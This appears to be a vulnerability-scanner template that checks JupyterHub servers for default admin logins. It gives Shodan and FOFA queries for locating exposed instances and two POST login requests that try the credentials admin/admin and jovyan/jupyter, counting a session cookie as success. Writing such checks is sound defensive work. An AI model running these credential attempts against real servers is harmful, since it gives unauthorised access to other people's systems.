漏洞描述
Jupyterhub default admin credentials were discovered.
SHODAN: http.title:"JupyterHub"
FOFA: title="JupyterHub"
id: jupyterhub-default-login
info:
name: Jupyterhub - Default Admin Discovery
author: For3stCo1d
severity: high
verified: true
description: |
Jupyterhub default admin credentials were discovered.
SHODAN: http.title:"JupyterHub"
FOFA: title="JupyterHub"
reference:
- https://github.com/jupyterhub/jupyterhub
tags: jupyterhub,default-login
created: 2023/06/24
rules:
r0:
request:
method: POST
path: /hub/login?next=
body: username=admin&password=admin
expression: response.status == 302 && (response.raw_header.ibcontains(b'jupyterhub-session-id=') || response.raw_header.ibcontains(b'jupyterhub-hub-login='))
r1:
request:
method: POST
path: /hub/login?next=
body: username=jovyan&password=jupyter
expression: response.status == 302 && (response.raw_header.ibcontains(b'jupyterhub-session-id=') || response.raw_header.ibcontains(b'jupyterhub-hub-login='))
expression: r0() || r1()